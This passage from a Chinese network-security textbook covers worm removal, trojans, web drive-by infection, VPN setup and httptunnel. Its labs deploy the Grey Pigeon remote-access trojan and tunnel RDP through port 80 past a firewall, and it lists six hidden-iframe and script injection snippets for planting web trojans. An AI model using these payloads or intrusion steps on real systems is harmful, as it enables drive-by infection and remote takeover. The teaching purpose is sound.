í)，在“開始”→“運(yùn)行”中輸入“shutdown–a”命令并執(zhí)行即可）。“沖擊波”蠕蟲病毒的清除過程如下：第1步：中止進(jìn)程。在Windows任務(wù)管理器的“進(jìn)程”選項(xiàng)卡中查找msblast.exe（或teekids.exe、penis32.exe），選中它，然后單擊下方的“結(jié)束進(jìn)程”按鈕。提示：也可以在命令提示符窗口執(zhí)行命令：taskkill.exe/immsblast.exe（或taskkill.exe

/imteekids.exe、taskkill.exe/impenis32.exe）。第2步：刪除病毒體。搜索msblast.exe（或teekids.exe、penis32.exe），在“搜索結(jié)果”窗口中將找到的文件徹底刪除。提示：在WindowsXP系統(tǒng)中，應(yīng)首先禁用“系統(tǒng)還原”功能，方法是：右鍵單擊“我的電腦”，選擇“屬性”，在“系統(tǒng)屬性”對話框中選擇“系統(tǒng)還原”選項(xiàng)卡，勾選“在所有驅(qū)動(dòng)器上關(guān)閉系統(tǒng)還原”即可。也可以在命令提示符窗口執(zhí)行如下命令：“Del系統(tǒng)盤符\windows\system\msblast.exe”（WindowsXP系統(tǒng)）。第3步：修改注冊表。打開注冊表編輯器，依次找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”，刪除“windowsautoupdate=msblast.exe”（病毒變種可能會(huì)有不同的顯示內(nèi)容）。第4步：重啟計(jì)算機(jī)。重啟計(jì)算機(jī)后，“沖擊波”蠕蟲病毒就從系統(tǒng)中完全清除了。5.12特洛伊木馬1．特伊洛木馬的定義在計(jì)算機(jī)領(lǐng)域，特洛伊木馬只是一個(gè)程序，它駐留在目標(biāo)計(jì)算機(jī)中，隨計(jì)算機(jī)啟動(dòng)而自動(dòng)啟動(dòng)，并且在某一端口進(jìn)行監(jiān)聽，對接收到的數(shù)據(jù)進(jìn)行識(shí)別，然后對目標(biāo)計(jì)算機(jī)執(zhí)行相應(yīng)的操作。特洛伊木馬包括兩個(gè)部分：被控端和控制端。（1）被控端。又稱服務(wù)端，將其植入要控制的計(jì)算機(jī)系統(tǒng)中，用于記錄用戶的相關(guān)信息，比如密碼、賬號(hào)等，相當(dāng)于給遠(yuǎn)程計(jì)算機(jī)系統(tǒng)安裝了一個(gè)后門。（2）控制端。又稱客戶端，黑客用來發(fā)出控制命令，比如傳輸文件、屏幕截圖、鍵盤記錄，甚至是格式化硬盤等。2．特伊洛木馬的類型常見的特伊洛木馬有：正向連接木馬和反向連接木馬。（1）正向連接木馬。正向連接木馬是在中木馬者的機(jī)器上開個(gè)端口，黑客去連接這個(gè)端口，前提條件是要知道中木馬者的IP地址。（2）反向連接木馬。反向連接木馬讓中木馬者來連接黑客，不管中木馬者的IP地址如何改變，都能夠被控制。但是，如果黑客的IP地址改變了，中木馬者就不能連接黑客的計(jì)算機(jī)了，解決該問題的方法是中木馬者通過域名來連接黑客的計(jì)算機(jī)，只要黑客申請一個(gè)域名即可。3．木馬傳播方式（1）利用郵箱傳播木馬。（2）網(wǎng)站主頁掛馬。（3）論壇漏洞掛馬。（4）文件類型偽裝。（5）QQ群發(fā)網(wǎng)頁木馬。（6）圖片木馬、RM木馬、Flash木馬。（7）在Word文檔中加入木馬文件。（8）用BT制作木馬種子。（9）黑客工具中綁定木馬。（10）偽裝成應(yīng)用程序的擴(kuò)展組件。5.12.2實(shí)例—反向連接木馬的傳播1．實(shí)驗(yàn)環(huán)境2．生成木馬的服務(wù)器端第1步：下載并在xp()中安裝灰鴿子。第2步：在xp中配置反向連接木馬。運(yùn)行灰鴿子，單擊“配置服務(wù)程序”，選擇“自動(dòng)上線設(shè)置”選項(xiàng)卡，在IP欄中輸入黑客（客戶端）的IP地址“”，其他配置信息根據(jù)界面提示進(jìn)行設(shè)置。“HKFX2008_OK.exe”是最終生成的反向連接木馬服務(wù)器端。3．把木馬服務(wù)器端植入他人的電腦(win2003)直接將反向連接木馬服務(wù)器端“HKFX2008_OK.exe”復(fù)制到被入侵電腦ztg2003（）中。接下來運(yùn)行HKFX2008_OK.exe，反向連接木馬就會(huì)自動(dòng)進(jìn)行安裝，首先將自身復(fù)制到C:\WINDOWS或C:\WINDOWS\SYSTEM目錄下，然后在注冊表、啟動(dòng)組、非啟動(dòng)組中設(shè)置好木馬的觸發(fā)條件，這樣木馬的安裝就完成了。注意：木馬的傳播方式主要有兩種。一種是通過電子郵件，控制端將木馬程序以郵件附件的形式發(fā)出去，收信人只要打開附件，系統(tǒng)就會(huì)感染木馬。另一種是軟件下載，一些非正規(guī)的網(wǎng)站以提供軟件下載為名義，將木馬捆綁在軟件安裝程序上，下載后，只要一運(yùn)行這些程序，木馬就會(huì)自動(dòng)安裝。4．黑客進(jìn)行遠(yuǎn)程控制由于是反向連接木馬，所以服務(wù)器端上線后就會(huì)自動(dòng)連接客戶端xp（黑客），在主界面中可以看到“ztg2003”已經(jīng)與黑客電腦連接了，即被黑客控制。在“文件管理器”選項(xiàng)卡中，可以像使用“Windwos資源管理器”一樣來新建、刪除、重命名、下載被入侵電腦中的文件。在“遠(yuǎn)程控制命令”選項(xiàng)卡中，可以查看被入侵電腦的系統(tǒng)信息；可以查看、終止被入侵電腦的進(jìn)程；可以啟動(dòng)、關(guān)閉被入侵電腦的服務(wù)等。在“命令廣播”選項(xiàng)卡中，可以向所有被入侵電腦發(fā)送相同的命令。5．手工清除灰鴿子確認(rèn)灰鴿子的服務(wù)進(jìn)程名稱，假如是“HKFX2008_OK”，右鍵單擊“我的電腦”圖標(biāo)，選擇“服務(wù)”，，禁止“HKFX2008_OK”服務(wù)，右鍵單擊該服務(wù)，選擇“屬性”，在屬性對話框中得到該服務(wù)文件的位置，將其刪除即可。5.12.3實(shí)例—查看開放端口判斷木馬木馬通?；赥CP/UDP協(xié)議進(jìn)行Client端與Server端之間的通訊，因此，木馬會(huì)在Server端打開監(jiān)聽端口來等待Client端連接。例如冰河的監(jiān)聽端口是7626。所以，可以通過查看本機(jī)開放的端口，來檢查是否被植入了木馬或其他黑客程序。下面使用Windows自帶的netstat命令（Linux也有該命令）查看端口。C:\DocumentsandSettings\Administrator>netstat

-anActiveConnections

ProtoLocalAddressForeignAddressStateTCP:135:0LISTENINGTCP:1038:1039ESTABLISHEDTCP:1039:1038ESTABLISHEDTCP:139:0LISTENINGTCP:1064:80TIME_WAITTCP:1065:80TIME_WAITTCP:7626:0LISTENINGUDP:445*:*UDP:123*:*ActiveConnections：指當(dāng)前本機(jī)活動(dòng)連接；Proto：連接使用的協(xié)議；LocalAddress：本地計(jì)算機(jī)的IP地址和連接正在使用的端口號(hào)；ForeignAddress：連接該端口的遠(yuǎn)程計(jì)算機(jī)的IP地址和端口號(hào)；State：表明TCP連接的狀態(tài)，其中，7626端口正在監(jiān)聽，很有可能被植入了冰河木馬，此時(shí)，要立刻斷開網(wǎng)絡(luò)，清除木馬。5.13網(wǎng)頁病毒、網(wǎng)頁掛(木)馬網(wǎng)頁病毒、網(wǎng)頁掛（木）馬在新型的病毒大軍中危害面最廣，傳播效果最佳。網(wǎng)頁病毒、網(wǎng)頁掛（木）馬之所以非常流行是因?yàn)椋核麄兊募夹g(shù)含量比較低、免費(fèi)空間和個(gè)人網(wǎng)站增多、上網(wǎng)人群的安全意識(shí)比較低，另外，國內(nèi)網(wǎng)頁掛（木）馬大多是針對IE瀏覽器。5.13.1實(shí)例—網(wǎng)頁病毒、網(wǎng)頁掛馬1．實(shí)驗(yàn)環(huán)境2．實(shí)驗(yàn)過程第1步：設(shè)置IP地址。在Windows2003上，對本臺(tái)電腦的網(wǎng)卡設(shè)置兩個(gè)IP地址，目的是要在本臺(tái)電腦上架設(shè)基于IP地址（、）的兩個(gè)網(wǎng)站。第2步：打開“Internet信息服務(wù)（IIS）管理器”。在Windows2003上，打開“Internet信息服務(wù)（IIS）管理器”，右鍵單擊“默認(rèn)網(wǎng)站”選擇右鍵菜單中的“屬性”菜單命令，為本網(wǎng)站選擇的IP地址是。第3步：創(chuàng)建網(wǎng)站。在Windows2003上，右鍵單擊“網(wǎng)站”，依次選擇“新建”和“屬性”菜單命令，開始創(chuàng)建網(wǎng)站。第4步：創(chuàng)建www_muma網(wǎng)站的主目錄。在Windows2003上，在Inetpub文件夾中創(chuàng)建www_muma子文件夾，，該文件夾就是第3步新建網(wǎng)站的主目錄。wwwroot是默認(rèn)網(wǎng)站的主目錄。第5步：復(fù)制網(wǎng)站文件。在Windows2003上，讀者可以將兩個(gè)簡單的網(wǎng)站文件分別復(fù)制到wwwroot和www_muma文件夾中。編輯wwwroot文件夾中的INDEX.HTM文件，在該文件源代碼的</body>…</body>之間插入如圖所示的被圈部分代碼。第6步：打開瀏覽器。在WindowsXP上，打開瀏覽器（IE或者Firefox），地址欄輸入。注意：圖中左上角的被圈部分，是圖中橢圓部分代碼的效果。第7步：編輯wwwroot中的INDEX.HTM文件。在Windows2003上，編輯C:\Inetpub\wwwroot\INDEX.HTM文件，插入如圖所示的被圈部分代碼。wwwroot中INDEX.HTM文件的代碼說明如表5.27/214所示。第8步：打開瀏覽器。在WindowsXP上，打開瀏覽器（IE或者Firefox），地址欄輸入。注意：圖中左上角的被圈部分，是index.htm中橢圓部分代碼的效果。第9步：編輯www_muma文件夾中的INDEX.HTM文件。在Windows2003上，編輯C:\Inetpub\www_muma\INDEX.HTM文件，插入如圖所示的被圈部分代碼。www_muma文件夾中INDEX.HTM文件的代碼說明見表5.28/215。第10步：打開IE瀏覽器。在WindowsXP上，打開IE瀏覽器，地址欄輸入，此時(shí)，網(wǎng)頁木馬已經(jīng)在自己的電腦中創(chuàng)建了兩個(gè)文件。3．一些常用的掛馬方式（1）框架掛馬。<iframesrc="網(wǎng)馬地址"width=0height=0></iframe>（2）body掛馬。<bodyonload="window.location='網(wǎng)馬地址';"></body>（3）java掛馬。<scriptlanguage=javascript>window.open("網(wǎng)馬地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>（4）js文件掛馬。首先將代碼“document.write("<iframewidth=0height=0src='網(wǎng)馬地址'></iframe>");”保存為muma.js文件，則js文件掛馬代碼為“<scriptlanguage=javascriptsrc=muma.js></script>”。（5）css中掛馬。body{background-image:url('javascript:document.write("<scriptsrc=/muma.js></script>")')}（6）高級(jí)欺騙。<ahref=(迷惑連接地址)onMouseOver="muma();returntrue;">搜狐首頁</a><scriptlanguage=javascript>functionmuma(){open("網(wǎng)馬地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");}</script>5.13.2網(wǎng)頁病毒、網(wǎng)頁掛馬基本概念

1．網(wǎng)頁病毒網(wǎng)頁病毒是利用網(wǎng)頁來進(jìn)行破壞的病毒，它存在于網(wǎng)頁之中，其實(shí)是使用一些腳本語言編寫的一些惡意代碼，利用瀏覽器漏洞來實(shí)現(xiàn)病毒的植入。2．網(wǎng)頁掛馬（網(wǎng)頁木馬）網(wǎng)頁掛馬是指黑客自己建立帶病毒的網(wǎng)站，或者入侵大流量網(wǎng)站，然后在其網(wǎng)頁中植入木馬和病毒，當(dāng)用戶瀏覽到這些網(wǎng)頁時(shí)就會(huì)中毒。3．WSH（WindowsScriptingHost，Windows腳本宿主）WSH是內(nèi)嵌于Windows操作系統(tǒng)中的腳本語言工作環(huán)境。WSH的優(yōu)點(diǎn)在于它能夠使人們可以充分利用腳本來實(shí)現(xiàn)計(jì)算機(jī)工作的自動(dòng)化，缺點(diǎn)是許多計(jì)算機(jī)病毒制造者正在熱衷于用腳本語言來編制病毒，并利用WSH的支持功能，讓這些隱藏著病毒的腳本在網(wǎng)絡(luò)中廣為傳播。借助WSH的這一缺陷，通過JavaScript、VBScript、ActiveX等網(wǎng)頁腳本語言，就產(chǎn)生了大量的網(wǎng)頁病毒和網(wǎng)頁木馬。4．網(wǎng)頁木馬的基本工作流程（1）打開含有網(wǎng)頁木馬的網(wǎng)頁。（2）網(wǎng)頁木馬利用瀏覽器漏洞或者一些腳本功能下載一個(gè)可執(zhí)行文件或腳本。5．網(wǎng)頁木馬的種類（1）Flash動(dòng)畫木馬。（2）圖片木馬。5.13.3病毒、蠕蟲和木馬的清除和預(yù)防1．遭受網(wǎng)頁病毒、網(wǎng)頁木馬攻擊后的癥狀（1）上網(wǎng)前系統(tǒng)一切正常，下網(wǎng)后系統(tǒng)就會(huì)出現(xiàn)異常情況。（2）默認(rèn)主頁被更改，IE瀏覽器工具欄內(nèi)的修改功能被屏蔽。（3）不定時(shí)彈出廣告。（4）電腦桌面及桌面上的圖標(biāo)被隱藏。（5）在電腦桌面上無故出現(xiàn)陌生網(wǎng)站的鏈接。（6）登錄某個(gè)網(wǎng)站后，發(fā)現(xiàn)迅速打開一個(gè)窗口后又消失，并且在系統(tǒng)文件夾內(nèi)多了幾個(gè)未知的、類似系統(tǒng)文件的新文件。（7）私有賬號(hào)無故丟失。（8）發(fā)現(xiàn)多了幾個(gè)未知的進(jìn)程，而且刪不掉，重啟后又會(huì)出現(xiàn)。（9）CPU利用率一直很高。（10）注冊表編輯器被鎖定。2．清除病毒、蠕蟲和木馬的一般方法（1）使用殺毒軟件或者專殺工具查殺。（2）查看任務(wù)管理器，發(fā)現(xiàn)仿系統(tǒng)文件的進(jìn)程要立刻禁止掉，然后到相應(yīng)的路徑查看該文件的“創(chuàng)建時(shí)間”，如果和中毒時(shí)間相仿，那么就說明該文件極有可能是病毒文件。因?yàn)橄到y(tǒng)文件的創(chuàng)建時(shí)間比較早，大約要比當(dāng)前時(shí)間早2～5年，按如此辦法就可以逐一的找出可疑的文件，然后將他們刪除，如果在Windows中不能刪除，那么要進(jìn)入DOS進(jìn)行刪除。（3）修改注冊表。網(wǎng)頁病毒通過注冊表具有再生的功能，所以要注意注冊表啟動(dòng)項(xiàng)：[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices][HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce][HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run][HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce][HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run][HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce][HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]一般情況，上面的所有的鍵值都為空，如果不為空，應(yīng)該全部清空。另外，也應(yīng)注意關(guān)聯(lián)項(xiàng)目，正確的鍵值如下：[HKEY_CLASSES_ROOT\chm.file\shell\open\command"(默認(rèn))""hh.exe"%1][HKEY_CLASSES_ROOT\exefile\shell\open\command"(默認(rèn))""%1"%*][HKEY_CLASSES_ROOT\inifile\shell\open\command"(默認(rèn))"%SystemRoot%\System32\NOTEPAD.EXE%1][HKEY_CLASSES_ROOT\regfile\shell\open\command"(默認(rèn))"regedit.exe"%1"][HKEY_CLASSES_ROOT\scrfile\shell\open\command"(默認(rèn))""%1"/S][HKEY_CLASSES_ROOT\txtfile\shell\open\command"(默認(rèn))"%SystemRoot%\system32\NOTEPAD.EXE%1]（4）清理配置文件啟動(dòng)項(xiàng)。關(guān)注autoexec.bat、win.ini和system.ini文件。autoexec.bat的內(nèi)容為空；win.ini文件中[Windows]下面，“run=”和“l(fā)oad=”是可能加載木馬程序的途徑。一般情況下，等號(hào)后面什么都沒有；system.ini文件中[boot]下面有個(gè)“shell=文件名”。正確的文件名應(yīng)該是“explorer.exe”，如果不是“explorer.exe”，而是“shell=explorer.exe程序名”，那么后面跟著的那個(gè)程序就是木馬程序，就是說你已經(jīng)中木馬了。（5）清理緩存。由于病毒會(huì)停留在計(jì)算機(jī)的臨時(shí)文件夾與緩存目錄中，所以要清理C:\DocumentsandSettings\Administrator（或其他用戶名）\LocalSettings文件夾中Temp和TemporaryInternetFiles子文件夾里的內(nèi)容。（6）檢查啟動(dòng)組。開始程序啟動(dòng)中是否有奇怪的啟動(dòng)文件，現(xiàn)在的木馬大多不再通過啟動(dòng)菜單進(jìn)行隨機(jī)啟動(dòng)，但是也不可掉以輕心。如果發(fā)現(xiàn)在“開始/程序/啟動(dòng)”中有新增的項(xiàng)，就要多加小心。（7）通過文件對比查找木馬。（8）清除木馬。清除木馬的一般過程是：首先確認(rèn)木馬進(jìn)程，然后停止該進(jìn)程，再在注冊表里清理相關(guān)表項(xiàng)，最后刪除硬盤上木馬文件。（9）查看可疑端口。端口掃描是檢查遠(yuǎn)程機(jī)器有無木馬的最好辦法，查看連接和端口掃描的原理基本相同，不過是在本地機(jī)上的命令行窗口中執(zhí)行“netstat–a”命令來查看所有的TCP/UDP連接。查看端口與進(jìn)程關(guān)系的小程序有ActivePorts和Tcpview等。（10）在安全模式或純DOS模式下清除病毒。對于現(xiàn)在大多數(shù)流行的蠕蟲病毒、木馬程序和網(wǎng)頁代碼病毒等，可以在安全模式下徹底清除，然而對于一些引導(dǎo)區(qū)病毒和感染可執(zhí)行文件的病毒則需要在純DOS下殺毒。3．預(yù)防網(wǎng)頁病毒、網(wǎng)頁木馬（1）安裝殺毒軟件，打開實(shí)時(shí)監(jiān)控。（2）經(jīng)常升級(jí)殺毒軟件的病毒庫。（3）安裝防火墻。（4）經(jīng)常更新系統(tǒng)，安裝安全補(bǔ)丁。（5）不要輕易訪問具有誘惑性的網(wǎng)站。（6）在IE中全部禁止ActiveX插件和控件、Java腳本。（7）打開IE屬性對話框中選擇“安全”選項(xiàng)卡，單擊“受限站點(diǎn)”，將“安全級(jí)別”設(shè)置為“高”，單擊“站點(diǎn)”按鈕，添加要阻止的危險(xiǎn)網(wǎng)址。（8）卸載ActiveXObject。在命令提示符下執(zhí)行“regsvr32.exeshell32.dll/u/s”命令，卸載Shell.application控件。如果以后要使用這個(gè)控件，在命令提示符下執(zhí)行“regsvr32.exeshell32.dll/i/s”命令重新安裝Shell.application控件。其中，“regsvr32.exe”是注冊或反注冊O(shè)LE對象或控件的命令，“/u”是反注冊參數(shù)，“/s”是安靜模式參數(shù)，“/i”是安裝參數(shù)。（9）定時(shí)備份。定時(shí)備份硬盤上的重要文件，可以用ghost備份分區(qū)，可以用diskgen備份分區(qū)表。（10）不要運(yùn)行來路不明的軟件，不要打開來路不明的郵件。5.13.4流行殺毒軟件簡介國內(nèi)市場上單機(jī)版殺毒軟件的主流產(chǎn)品分別是：《金山毒霸》、《瑞星殺毒軟件》、《江民殺毒軟件KV》、《卡巴斯基殺毒軟件》、《NortonAntiVirus》、《360殺毒軟件》。5.14.1VPN技術(shù)概述1．虛擬專用網(wǎng)（VirtualPrivateNetwork，VPN）的定義VPN就是通過一個(gè)公用網(wǎng)絡(luò)（公用網(wǎng)絡(luò)包括IP網(wǎng)絡(luò)、幀中繼網(wǎng)絡(luò)和ATM網(wǎng)絡(luò)，通常是指互聯(lián)網(wǎng)）建立一個(gè)臨時(shí)的、安全的連接，是一條穿過公用網(wǎng)絡(luò)的安全、穩(wěn)定的通道。VPN不是真的專用網(wǎng)絡(luò)，但卻能夠?qū)崿F(xiàn)專用網(wǎng)絡(luò)的功能。一般情況下VPN有PPTPVPN、IPSECVPN和L2TPVPN3種，其中PPTPVPN最簡便，IPSECVPN最通用，各個(gè)平臺(tái)都支持，L2TPVPN最安全。2．VPN的基本功能VPN的功能至少要包含以下幾個(gè)方面。（1）加密數(shù)據(jù)：保證通過公用網(wǎng)絡(luò)傳輸?shù)男畔⒓词贡黄渌私孬@也不會(huì)泄露。（2）信息驗(yàn)證和身份識(shí)別：保證信息的完整性、合理性，并能鑒別用戶的身份。（3）提供訪問控制：不同的用戶有不同的訪問權(quán)限。（4）地址管理：能夠?yàn)橛脩舴峙鋵Ｓ镁W(wǎng)絡(luò)上的地址并確保地址的安全性。（5）密鑰管理：能夠生成并更新客戶端和服務(wù)器的加密密鑰。（6）多協(xié)議支持：能夠支持公共網(wǎng)絡(luò)上普遍使用的基本協(xié)議（包括IP、IPX等）。3．VPN的優(yōu)點(diǎn)（1）降低費(fèi)用：遠(yuǎn)程用戶可以在當(dāng)?shù)亟尤隝nternet，以Internet作為通道與企業(yè)內(nèi)部的專用網(wǎng)絡(luò)相連，可以大幅降低通信費(fèi)用，另外企業(yè)可以節(jié)省購買和維護(hù)通信設(shè)備的費(fèi)用。（2）安全性增強(qiáng)：VPN使用通道協(xié)議、身份驗(yàn)證和數(shù)據(jù)加密3個(gè)方面的技術(shù)保證通信的安全性。（3）支持最常用的網(wǎng)絡(luò)協(xié)議：在基于IP、IPX和NetBUI協(xié)議的網(wǎng)絡(luò)中的客戶機(jī)都能夠很容易的使用VPN。（4）有利于IP地址安全：VPN是加密的，VPN數(shù)據(jù)在Internet中傳輸時(shí)，Internet上的用戶只看到公共的IP地址，看不到數(shù)據(jù)包內(nèi)包含的專用網(wǎng)絡(luò)地址。5.14.2實(shí)例—配置基于Windows平臺(tái)的VPN1．在Windows2003ServerSP2上配置VPN服務(wù)器的過程第1步：打開“路由和遠(yuǎn)程訪問服務(wù)器安裝向?qū)А贝翱?。進(jìn)入“開始”→“程序”→“管理工具”→“路由和遠(yuǎn)程訪問”。右鍵單擊左邊框架中的“ZTG2003（本地）”（ZTG2003為服務(wù)器名），選擇“配置并啟用路由和遠(yuǎn)程訪問”。禁用防火墻和互聯(lián)網(wǎng)連接共享：開始|程序|管理工具|服務(wù)|whidows/internetconnectionshare(ICS)|禁用第2步：選擇網(wǎng)絡(luò)接口。選擇“遠(yuǎn)程訪問（撥號(hào)或VPN）”，然后單擊“下一步”按鈕，選擇“VPN”，然后單擊“下一步”按鈕，選擇網(wǎng)絡(luò)接口（本實(shí)驗(yàn)選擇），然后單擊“下一步”按鈕。第3步：指定IP地址。要為遠(yuǎn)程VPN客戶端指定IP地址。默認(rèn)選項(xiàng)為“自動(dòng)”，由于本機(jī)沒有配置DHCP服務(wù)器，因此需要改選為“來自一個(gè)指定的地址范圍”，然后單擊“下一步”按鈕。在“新建地址范圍”窗口中，可以為VPN客戶機(jī)指定所分配的IP地址范圍。比如分配的IP地址范圍為“00”～“00”，此時(shí)需注意，不可以將本身的IP地址（）包含進(jìn)去。然后單擊“確定”按鈕。注意：這些IP地址將分配給VPN服務(wù)器和VPN客戶機(jī)。為了確保連接后的VPN網(wǎng)絡(luò)能同VPN服務(wù)器原有局域網(wǎng)正常通信，他們必須同VPN服務(wù)器的IP地址處在同一個(gè)網(wǎng)段中。即假設(shè)VPN服務(wù)器IP地址為“”，則此范圍中的IP地址均應(yīng)該以“192.168.0”開頭。單擊“確定”按鈕，然后單擊“下一步”按鈕繼續(xù)。第4步：結(jié)束VPN服務(wù)器的配置。在“管理多個(gè)遠(yuǎn)程訪問服務(wù)器”一步用于設(shè)置集中管理多個(gè)VPN服務(wù)器。默認(rèn)選項(xiàng)為“否，使用路由和遠(yuǎn)程訪問來對連接請求進(jìn)行身份驗(yàn)證”，不用修改，直接單擊“下一步”按鈕，直接單擊“完成”按鈕。結(jié)束了VPN服務(wù)器的配置工作。說明：此時(shí)“路由和遠(yuǎn)程訪問”控制臺(tái)中的“路由和遠(yuǎn)程訪問”服務(wù)已經(jīng)處于“已啟動(dòng)”狀態(tài)了；而在“網(wǎng)絡(luò)和撥號(hào)連接”窗口中也會(huì)多出一個(gè)“傳入的連接”圖標(biāo)。第5步：賦予用戶撥入權(quán)限。默認(rèn)情況下，包括Administrator用戶在內(nèi)的所有用戶均被拒絕撥入到VPN服務(wù)器上，因此需要為相應(yīng)用戶賦予撥入權(quán)限。下面以“Administrator”用戶為例。（1）在“我的電腦”處單擊右鍵，選“管理”打開“計(jì)算機(jī)管理”控制臺(tái)。（2）在左邊框架中依次展開“本地用戶和組”→“用戶”，在右邊框架中雙擊“Administrator”。（3）轉(zhuǎn)到“撥入”選項(xiàng)卡，在“選擇訪問權(quán)限（撥入或VPN）”選項(xiàng)組下默認(rèn)選項(xiàng)為“通過遠(yuǎn)程訪問策略控制訪問”，改選為“允許訪問”，然后單擊“確定”按鈕返回“計(jì)算機(jī)管理”控制臺(tái)，即結(jié)束了賦予“Administrator”用戶撥入權(quán)限的工作。2．VPN客戶機(jī)（WinXP）的配置過程第1步：打開“網(wǎng)絡(luò)連接”窗口。在“網(wǎng)上鄰居”處單擊右鍵，選“屬性”打開“網(wǎng)絡(luò)連接”窗口，單擊“創(chuàng)建一個(gè)新的連接”，在彈出的窗口中單擊“下一步”按鈕，選擇“連接到我的工作場所的網(wǎng)絡(luò)”，單擊“下一步”按鈕，選擇“虛擬專用網(wǎng)絡(luò)連接”，單擊“下一步”按鈕。第2步：輸入公司名。輸入公司名，單擊“下一步”按鈕，在“公用網(wǎng)絡(luò)”一步可以選擇是否在VPN連接前自動(dòng)撥號(hào)。默認(rèn)選項(xiàng)為“自動(dòng)撥此初始連接”，需要改選為“不撥初始連接”，然后單擊“下一步”按鈕。第3步：輸入VPN服務(wù)器的IP地址。需要提供VPN服務(wù)器的主機(jī)名或IP地址。在文本框中輸入VPN服務(wù)器的IP地址，本實(shí)驗(yàn)VPN服務(wù)器IP地址是，然后單擊“下一步”按鈕，可以勾選“在我的桌面添加一快捷方式”復(fù)選框，然后單擊“完成”按鈕。之后會(huì)自動(dòng)彈出“連接win2003”對話框。輸入用戶名和密碼，根據(jù)需要勾選“我下面用戶保存用戶名和密碼”復(fù)選框，然后單擊“連接”按鈕。注意：此處輸入的用戶名應(yīng)為VPN服務(wù)器上已經(jīng)建立好，并設(shè)置了具有撥入服務(wù)器權(quán)限的用戶，密碼也為其密碼。連接成功之后可以看到，雙方的任務(wù)欄右側(cè)均會(huì)出現(xiàn)兩個(gè)撥號(hào)網(wǎng)絡(luò)成功運(yùn)行的圖標(biāo)，其中一個(gè)是到Intenet的連接，另一個(gè)則是VPN的連接了。注意：當(dāng)雙方建立好了通過Internet的VPN連接后，即相當(dāng)于又在Internet上建立好了一個(gè)雙方專用的虛擬通道，而通過此通道，雙方可以在網(wǎng)上鄰居中進(jìn)行互訪，即相當(dāng)于又組成了一個(gè)局域網(wǎng)絡(luò)，這個(gè)網(wǎng)絡(luò)是雙方專用的，而且具有良好的保密性能。VPN建立成功之后，雙方便可以通過IP地址或“網(wǎng)上鄰居”來達(dá)到互訪的目的，當(dāng)然也就可以使用對方所共享出來的軟硬件資源了。當(dāng)VPN網(wǎng)絡(luò)建立成功之后，VPN客戶機(jī)和VPN服務(wù)器，或者VPN客戶機(jī)和VPN服務(wù)器所在的局域網(wǎng)中的其他電腦，進(jìn)行共享資源的互訪的方法是，在資源管理器窗口的地址欄輸入“\\對方IP地址”來訪問對方共享出的軟硬件資源。如果VPN客戶機(jī)不能訪問互聯(lián)網(wǎng)，是因?yàn)閂PN客戶機(jī)使用了VPN服務(wù)器定義的網(wǎng)關(guān)，解決方法是禁止VPN客戶機(jī)使用VPN服務(wù)器上的默認(rèn)網(wǎng)關(guān)。具體操作方法：對于WindowsXP客戶機(jī)，在“網(wǎng)絡(luò)和撥號(hào)連接”窗口中，先選中相應(yīng)的連接名，比如為“win2003”，單擊右鍵，選“屬性”打開“win2003屬性”窗口。再轉(zhuǎn)到“網(wǎng)絡(luò)”選項(xiàng)卡，雙擊列表中的“Internet協(xié)議（TCP/IP）”打開“Internet協(xié)議（TCP/IP）屬性”窗口。然后單擊“高級(jí)”按鈕進(jìn)入“高級(jí)TCP/IP設(shè)置”窗口的“常規(guī)”選項(xiàng)卡，去掉“在遠(yuǎn)程網(wǎng)絡(luò)上使用默認(rèn)網(wǎng)關(guān)”前的小勾即可。5.15實(shí)例—httptunnel技術(shù)

1．httptunnel技術(shù)httptunnel技術(shù)也稱為隧道技術(shù)，是一種繞過防火墻端口屏蔽的通信方式。httptunnel原理：在防火墻兩邊的主機(jī)上都有一個(gè)轉(zhuǎn)換程序，將原來需要發(fā)送或接受的數(shù)據(jù)包封裝成HTTP請求的格式騙過防火墻，當(dāng)被封裝的數(shù)據(jù)包穿過防火墻到達(dá)對方時(shí)，再由轉(zhuǎn)換程序?qū)?shù)據(jù)包還原，然后將還原的數(shù)據(jù)包交給相應(yīng)的服務(wù)程序。由此可知，攻擊者可以利用這種技術(shù)實(shí)現(xiàn)遠(yuǎn)程控制。httptunnel的官方網(wǎng)站是。2．實(shí)例—通過httptunnel技術(shù)進(jìn)行入侵

實(shí)驗(yàn)環(huán)境準(zhǔn)備：1.win2003啟動(dòng)遠(yuǎn)程桌面鼠右我的電腦，選屬性，再選遠(yuǎn)程2.win2003啟動(dòng)telnet服務(wù)、計(jì)算機(jī)名<15個(gè)字符；tlntsvr/servies第1步：下載并安裝httptunnel程序。在/files/httptunnel-3.3w32.zip下載httptunnel程序，其中包含3個(gè)文件：htc.exe（httptunnelclient，也就是客戶端）、hts.exe（httptunnelserver，也就是服務(wù)器端）和cygwin1.dll（一個(gè)動(dòng)態(tài)鏈接庫）。hts.exe是服務(wù)器端，安裝被入侵電腦中，htc.exe是客戶端，安裝在入侵者電腦中。第2步：在win2003中啟動(dòng)服務(wù)器端程序。將hts.exe復(fù)制到C:\DocumentsandSettings\Administrator目錄下面。將cygwin1.dll復(fù)制到C:\WINDOWS\system32目錄下面。如果本臺(tái)電腦的IIS已經(jīng)啟動(dòng)，則先將其關(guān)閉。開始－程序－管理工具－服務(wù)－IIS。在命令提示符窗口中執(zhí)行hts-Flocalhost:338980命令，該命令的含義是本機(jī)3389端口發(fā)出去的數(shù)據(jù)全部通過80端口中轉(zhuǎn)一下，80為hts監(jiān)聽的端口，3389是入侵者要連接的端口。然后執(zhí)行netstat-an命令，發(fā)現(xiàn)80端口已經(jīng)處于監(jiān)聽狀態(tài)。第3步：在winxp中執(zhí)行客戶端程序。將htc.exe復(fù)制到C:\DocumentsandSettings\Administrator目錄下面。將cygwin1.dll復(fù)制到C:\WINDOWS\system32目錄下面。入侵者在自己的電腦中執(zhí)行htc-F6789:80。其中htc是客戶